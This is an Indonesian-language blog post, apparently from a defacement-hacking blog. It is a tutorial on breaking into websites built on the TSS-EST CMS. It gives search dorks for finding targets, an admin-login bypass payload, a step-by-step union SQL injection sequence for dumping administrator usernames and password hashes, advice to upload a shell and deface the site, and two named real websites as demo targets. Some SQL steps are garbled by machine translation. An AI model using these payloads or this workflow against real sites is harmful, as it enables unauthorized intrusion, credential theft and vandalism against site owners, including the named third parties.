Deface Dengan Poc Syrian CMS TSS-EST - Mulitple Exploit

Kang Karding - Deface Dengan Poc Syrian CMS TSS-EST - Mulitple Exploit

Selamat Hati Libur all :D 
Di Suasana Libur ini saya akan membagiakn artikel deface yang di beri nama dengan : Deface Dengan Poc Syrian CMS TSS-EST - Mulitple Exploits 
Banyak Yang Bertanya ? kok di ujung Poc itu ada Multiple Exploits.Karena Poc Ini Bisa Menggunakan Dua Bug / exploit 
Yang Pertama Adalah Admin Bypass Dan Yang Kedua Adalah SQLI

Sudah Gak Perlu Basa Basi Nanti Gak Jadi Defacenya :D 

Siapkan Alat Deface Untuk Bug Bypass Admin
============================
Dork1  : "Powered by: TSS-EST.COM"  [Kembangin Sendiri Ya]
Dork 2 : "Powered by TSS-EST.COM"
Exploit: http.www[target].com/CMS
CMS itu Tempat Admin Login nya 
Jangan Lupa Siapkan Shell Untuk Upload Scrip Deface
============================
Langsung Kita Mulai Saja Bug Yang Pertama Yaitu Admin Bypaas

Yang Pertama Adalah Kita Dorking Dulu :D 


Setelah Itu Kita Buka Web Satu per satu dan Jangan Lupa Di Belakang Nya Di Kasi Exploit Seperti Ini Jika Berhasil Maka Akan Muncul Administrasi Login nya, Seperti ini :

Sekarang Kalian Isi Dengan ini 
Username : ADMIN' OR 1=1#
Password   :  ADMIN' OR 1=1#

Jika Berhasil Kalian Akan Di bawa Ke Menu Adminsitrasi nya Dan Kalian Tinggal Upload shell Deh :D 
Kalau Gak Bisa Upload Shell Kalian Cek Di Sini  Klik
===============================
Langsung Saja Kita Menggunakan Bug Ke 2 Yaitu Sqli Bug Sqli Menggunakan Dork Yang Sama Seperti Di atas Tetapi Kita Bisa Kembangin Sendiri 
#1 Contoh 
Dork SQLI : "Powered by TSS-EST.COM" = 
                   "Powered by TSS-EST.COM"?=
                          KEMBANGIN LAH

#2 Membuka situs web apapun 

seperti ==> www.target.com/index.php?id=1



#3 Sekarang Anda harus menambahkan (') pada akhir URL 


seperti ==> www.target.com/index.php?id=1 '

jika Anda mendapatkan error seperti ### Anda memiliki kesalahan pada MYSQL ###
website ini rentan terhadap injeksi sql. Bisa Juga Berbahas Inggris Yah :D 


#4  Sekarang kita harus mencari jumlah kolom


www.target.com/index.php?id=1 order by 10-- (ERROR)

www.target.com/index.php?id=1 order by 9-- (ERROR)

www.target.com/index.php?id=1 order by 8-- (ERROR)

www.target.com/index.php?id=1 order by 7-- (NO ERROR)


jumlah kolom 7 tidak menunjukkan acara apapun sehingga kita dapat dengan mudah mengatakan jumlah kolom 7


#5 Sekarang kita harus menemukan kolom rentan 


serikat www.target.com/index.php?id=1 pilih 1,2,3,4,5,6,7--

jika menunjukkan angka 2 kolom maka rentan adalah 2



#6  kita harus menemukan versi database 


www.target.com/index.php?id=1 serikat pilih 1, @@ version, 3,4,5,6,7--

Mengganti kolom rentan dengan "@@ version"

jika menunjukkan versi 5.1 log maka untuk bisa melanjutkan ke langkah berikutnya



#7  Sekarang menemukan nama database


serikat www.target.com/index.php?id=1 pilih 1group_concat (schema_name), 3,4,5,6,7 dari information_schema.schemata--



ia akan menampilkan nama data base biarkan nama data base adalah "dunia"



#8 Sekarang menemukan nama semua tabel 


union www.target.com/index.php?id=1 pilih 1, concat (table_name), 3,4,5,6,7 dari information_schema.tables mana table_schema = database yang () -


ia akan menampilkan banyak nama tabel kita harus menemukan hanya admin atau pengguna jenis nama tabel

biarkan kita menemukan nama tabel "administrator"



#9 Sekarang kita harus mencari nama kolom


union www.target.com/index.php?id=1 pilih 1, concat (column_name), 3,4,5,6,7 dari information_schema.columns mana table_schema = database yang () 

kita semua melihat banyak tidak ada nama kolom kita hanya harus menemukan user_name dan password

biarkan kita memiliki nama dua kolom user_name dan pass_word.



#10  Sekarang menemukan password dari user_name 


www.target.com/index.php?id=1 serikat pilih 1, concat (user_name, 0x3a, pass_word), 3,4,5,6,7 dari world.administrator


ia akan menampilkan username dan password

ia akan menampilkan password terenkripsi kita harus memiliki untuk mendekripsi

untuk decryted password saya direkomendasikan digunakan www.md5decypter.co.uk


Setelah itu Tinggal Cari Admin Loginnya Biasanya Admin Login nya Berada di 
http://www.[target]cms

Demo  Bypaas Admin : http://www.grccreation.com/ #No Error

Demo Sqli injection :
http://www.alhasnaacoffee.com/index.php?ACT=2&Cid=11''   #ERROR

                      SEMOGA BERMANFAT

0 Response to "Deface Dengan Poc Syrian CMS TSS-EST - Mulitple Exploit"

Posting Komentar